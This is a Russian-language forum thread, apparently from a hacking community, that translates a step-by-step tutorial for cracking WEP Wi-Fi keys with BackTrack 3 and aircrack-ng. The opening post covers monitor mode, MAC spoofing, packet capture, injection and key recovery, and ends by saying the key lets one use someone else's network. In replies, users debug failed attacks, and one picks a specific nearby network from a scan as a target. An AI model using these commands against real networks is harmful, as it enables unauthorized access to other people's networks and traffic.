PDA

Просмотр полной версии : Взлом WEP с помощью BactTrack 3


jawbreaker
19.02.2009, 20:32
Для взлома WEP ключа нам понадобится:
- BactTrack 3
- подходящий wifi адаптер(список (http://aircrack-ng.org/doku.php?id=compatibility_drivers)).
- Точка доступа с WEP-шифрованием
- Базовое знание терминов (https://forum.antichat.ru/thread32521-wep.html)

.::Подготовка WIFI адаптера::.
Способ #1:
Набираем в консоли:iwconfig. В ответ будет что-то вроде:bt ~ # iwconfig
lo no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"homenet" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: 00:17:9A:26:8C:0E
Bit Rate:18 Mb/s Tx-Power:15 dBm Sensitivity=1/1
Retryff RTS thrff Fragment thrff
Encryption key:1234-5678-99 Security modepen
Power Managementff
Link Quality=18/70 Signal level=-78 dBm Noise level=-96 dBm
Rx invalid nwid:5601 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Как видим, карточка находится в управляемом режиме -
чтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем:wlanconfig ath1 create wlandev wifi0 wlanmode monitor
Всё, осталось сменить mac-адрес и можно переходить к следующему этапу, подставляя вместо [device] и [interface] ath1.

Способ #2:
iwconfig
Выдаст вам имя интерфейса беспроводного адаптера. Затем нужно остановить адаптер:
airmon-ng stop [device]
Затем:
ifconfig down [interface]
Теперь нужно поменять MAC адрес адаптера:
macchanger --mac 00:11:22:33:44:66 [device]
Настало время запустить адаптер в режиме мониторинга:
airmon-ng start [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airmon-ngstart1.png
.::Атакуем цель::.
Ищем сеть с WEP шифрованием командой:
airodump-ng [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airodumpwifi0.png
Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
http://thew0rd.com/wp-content/gallery/wepcrack/airodumpoutput.png
Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш ;) .

Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplayfakeauth.png
Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/gallery/wepcrack/aireplaygenerateivs.png

Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем.

http://thew0rd.com/wp-content/gallery/wepcrack/captureivs_0.png

После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack.
Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

http://thew0rd.com/wp-content/gallery/wepcrack/aireplayattack2p.png

Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
-n указывает на то что ключ 128ми битный (может быть 64 битным).
http://thew0rd.com/wp-content/gallery/wepcrack/crackng.png
Всё, ключ найден можно выходить в интернет с помощью чужой сети ;)

Источник (http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/)

Переведено и дополнено jawbreaker специально для Античат.ру!

mikhoni
20.02.2009, 01:40
на самом деле я вызываю
aircrack-ng *.cap
и не парюсь, да и для вепа можно параметр -i поставить, тогда собирать будет только ключи инициализации (IVs) файлы тогда будут сохраняться как *.ivs

XENON4IK
20.02.2009, 02:58
Люди явно отстают от жизни))) ставим spoonwep2 и весь взлом упрощается до неузноваемости) пару кликов и через 5 минут у тебя уже ключик) конечно иногда попадаются такие сети где без рук не обойтись, но это редкость))

Black.Cat
28.02.2009, 22:53
ifconfig down [interface] - что должно быть вместо [interface]?

svesve
28.02.2009, 23:17
ifconfig down [interface] - что должно быть вместо [interface]?
название твоего сетевого интерфейса

в случае с wi-fi ath0
в случае с ethrnet eth0

Black.Cat
01.03.2009, 00:18
У меня карта Intel, вместо [device] писал wlan0.. Помоему карты Atheros определяются как ath0 ?..

karlsn
05.03.2009, 03:15
2 способа нагона пакетов не срабатывают ... Это из за чего может быть ? адаптер Edimax EW-7318USG

karlsn
05.03.2009, 03:20
http://img65.imageshack.us/img65/1223/ss1.jpg

http://img258.imageshack.us/img258/8826/ss3.jpg


http://img527.imageshack.us/img527/8169/ss2x.jpg

Stradi
06.03.2009, 20:58
Основная проблема в том, что сначала нужно провести фейковую авторизацию, а потом нагонять пакеты.

karlsn
06.03.2009, 23:23
хмммм... может на AP стоит mac фильтр , хотя я на 3 точки генил.
карта моожет ешё .... :confused:

Vub
11.03.2009, 20:58
У меня тоже самое с Orient XG701A. Правда иногда ловит ACKи , но не ловит ARP запросы.
У АР, видимо, сигнал мощнее вот она и ловится со своими ACKами. А ARP-запросы ассоциированного клиента похоже просто не ловятся из-за слабого сигнала => поэтому и идет лесом весь инъект.

Я, правда, не уверен. Может у кого еще есть мысли?

jawbreaker
11.03.2009, 21:04
Да, вы правы основная проблема это слабый сигнал.

Black.Cat
12.03.2009, 18:56
А для Kismet есть инструкции?

socrates
16.04.2009, 15:47
karlsn перед тем как проводить атаку -3 или -2
сначала нужно что бы атка -1 прошла успешно
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
на твоем последнем скрине видно что под AUTH нет ничего а должно стоять OPN в случае успешной аутентификации , тогда можно и генерить пакеты
я тоже использую карту Edimax EW-7318USG , с атакой -1 тоже траблы ... хотя наверно дело не в карте а в АРах ... так как некоторые точки доступа открываются с первого раза , некоторые иногда , а иные никак не хотят .

_SEREGA_
16.04.2009, 16:44
karlsn перед тем как проводить атаку -3 или -2
сначала нужно что бы атка -1 прошла успешно
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
на твоем последнем скрине видно что под AUTH нет ничего а должно стоять OPN в случае успешной аутентификации , тогда можно и генерить пакеты
я тоже использую карту Edimax EW-7318USG , с атакой -1 тоже траблы ... хотя наверно дело не в карте а в АРах ... так как некоторые точки доступа открываются с первого раза , некоторые иногда , а иные никак не хотят .

Да, у меня также! надо аутиентифицироваться (-1) а только потом генерить пакеты, иначе толку от них 0

у меня точка ловится с wep и никак не хочет открываться (-1) хотя тест inj (-9) отличный!
а другие dlink очень хорошо открываются!(-1)
зависит от ТД!

evgenst
17.04.2009, 15:55
хм, столкнулся со странной ситуацией: вместо essid строчка вида <length: 9>
есть мысли по этому поводу?

Stradi
17.04.2009, 17:52
(Моё предположение) Что это точки со старыми прошивками, или что-то в этом роде. Т.е. на точке стоит "Hide", но длина имени передается. По идее, ничем не отличается от обычной 0, только с длиной. Скорее всего сделано для того (отображение), чтобы можно было подбирать ссид, при необходимости.

Alexus
17.04.2009, 19:10
Это тип настройки, в настройках при скрытии можно указать скрывать длину essid или не скрывать. Это писалось в Xakep Спец (номер про беспроводные сети)

neznajut
30.08.2009, 21:16
EW-7318USG

bt ~ # wlanconfig ath1 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: no such device

Что ему не понравилось?

4ikotillo
31.08.2009, 03:33
EW-7318USG

bt ~ # wlanconfig ath1 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: no such device

Что ему не понравилось?

Попробуй заменить ath1 на ath0.

Или так

bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start wifi0


Должно получиться

neznajut
03.09.2009, 12:42
Да вот не получается. Выложу полный вывод всех операций. Теперь уже с убунты с установлеными madwifi и aircrack.ng. Пока результаты(выводы) одинаковы, что на bt, что на убунте. По этому позволил себе немного самодеятельности в осях.

e@Dana:~$ iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

vboxnet0 no wireless extensions.

pan0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.432 GHz Access Point: Not-Associated
Tx-Power=9 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

e@Dana:~$ wlanconfig ath1 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: No such device
e@Dana:~$ wlanconfig ath0 create wlandev wifi0 wlanmode monitor
wlanconfig: ioctl: No such device
root@Dana:~# airmon-ng stop ath0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy5]
root@Dana:~# airmon-ng start wifi0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2780 NetworkManager
2787 wpa_supplicant
2804 avahi-daemon
2805 avahi-daemon
3121 dhclient


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy5]
Способ первый мне казался проще, т.к. у второго я не знаю откуда взялся mac 00:11:22:33:44:66?

4ikotillo
03.09.2009, 23:13
Да вот не получается. Выложу полный вывод всех операций. Теперь уже с убунты с установлеными madwifi и aircrack.ng. Пока результаты(выводы) одинаковы, что на bt, что на убунте. По этому позволил себе немного самодеятельности в осях.







Способ первый мне казался проще, т.к. у второго я не знаю откуда взялся mac 00:11:22:33:44:66?

Чтож ты раньше не сказал, что у тебя чипсет от Ralink)))

Тогда порядок таков:
bt ~ # airmon-ng start wlan0

Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)


Она появиться у тебя в режиме mon0, далее по старинке:

bt ~ # airodump-ng mon0


Все остальное по мануалам)))

neznajut
08.11.2009, 20:12
Все остальное по мануалам)))
Спасибо, тогда продолжаю.)))

Ну значит так:
airodump-ng mon0 скрин (http://i.imagehost.org/0041/Screenshot-root_Dana.png)
Вывод:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:40:96:5A:1C:F8 -1 0 16 0 148 -1 OPN <length: 0>
00:23:F8:A2:7B:0E -71 95 377 43 6 54e. WPA2 CCMP PSK E
00:0C:42:26:4B:B5 -71 83 0 0 1 54 . OPN 5NET.NUPAKY
00:23:CD:F4:CF:7C -76 73 0 0 3 54 . WEP WEP 269
02:0B:6B:09:F6:9E -78 51 0 0 5 11 . OPN www.vasesit.cz-hs-24335
00:0B:6B:09:F6:9E -77 57 43 0 5 11 . OPN www.vasesit.cz-24335
00:24:D2:3C:B2:70 -79 56 0 0 6 54e WEP WEP 73d1d39
00:21:27:E0:35:D2 -78 78 81 0 1 11 . WEP WEP Svedova-interconnect
00:02:72:73:82:74 -83 17 0 0 1 54 WEP WEP 259
00:24:D2:59:C5:BA -1 0 9 0 158 -1 WEP WEP <length: 0>

BSSID STATION PWR Rate Lost Packets Probes

00:40:96:5A:1C:F8 00:0A:59:42:5D:5F -77 0 -11 0 13
00:40:96:5A:1C:F8 00:0A:59:42:5B:99 -83 0 - 5 0 3
(not associated) 00:0B:6B:81:BF:32 -83 0 - 1 0 1 5NET.NUPAKY.2
00:23:F8:A2:7B:0E 00:25:D3:48:38:13 -57 5e- 5e 215 384 E
00:0C:42:26:4B:B5 00:0A:59:42:43:52 -1 1 - 0 0 16
00:0C:42:26:4B:B5 00:02:72:56:6B:42 -1 11 - 0 0 4
00:23:CD:F4:CF:7C 00:14:A5:7D:4A:85 -81 0 - 1 130 9 269
00:0B:6B:09:F6:9E 00:30:4F:55:BB:A4 -1 11 - 0 0 15
00:21:27:E0:35:D2 00:1E:65:7E:F5:C8 -83 11 - 1 0 105
00:24:D2:59:C5:BA 00:1F:1F:3D:B2:57 -75 0 - 1 0 60

Скажем я выбрал 00:21:27:E0:35:D2 -78 78 81 0 1 11 . WEP WEP Svedova-interconnect

Теперь (по мануалу) команда airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device], значит я далжен написать(?):
root@Dana:~# airodump-ng -c 1 -w network.out –bssid 00:21:27:E0:35:D2 mon0
или
root@Dana:~# airodump-ng -c 1 -w network.out –bssid 00:21:27:E0:35:D2 mon0
но получаю
"airodump-ng --help" for help.

Где я ощибся, господа?

Benya-13
09.11.2009, 00:08
попробуй так root@Dana:~# airodump-ng -c 1 -w network.out --bssid 00:21:27:E0:35:D2 mon0

neznajut
09.11.2009, 10:47
попробуй так root@Dana:~# airodump-ng -c 1 -w network.out --bssid 00:21:27:E0:35:D2 mon0
Вроде пошло, но в итоге результат root@Dana:~# aircrack-ng -n 128 -b 00:21:27:E0:35:D2 network.out-01.cap
Opening network.out-01.cap
Got no data packets from target network!


Quitting aircrack-ng...

Что я мог сделать не так?

neznajut
09.11.2009, 20:56
Вроде пошло, но в итоге результат root@Dana:~# aircrack-ng -n 128 -b 00:21:27:E0:35:D2 network.out-01.cap
Opening network.out-01.cap
Got no data packets from target network!


Quitting aircrack-ng...

Что я мог сделать не так?
Наверно глупость какая то. Буду пока пробовать.

теща
11.11.2009, 06:26
Наверно глупость какая то. Буду пока пробовать.
тема выше бт4 там на много проще ,
2. а ты вот так по пробуй aircrack-ng -b 00:21:27:E0:35:D2 capture*.cap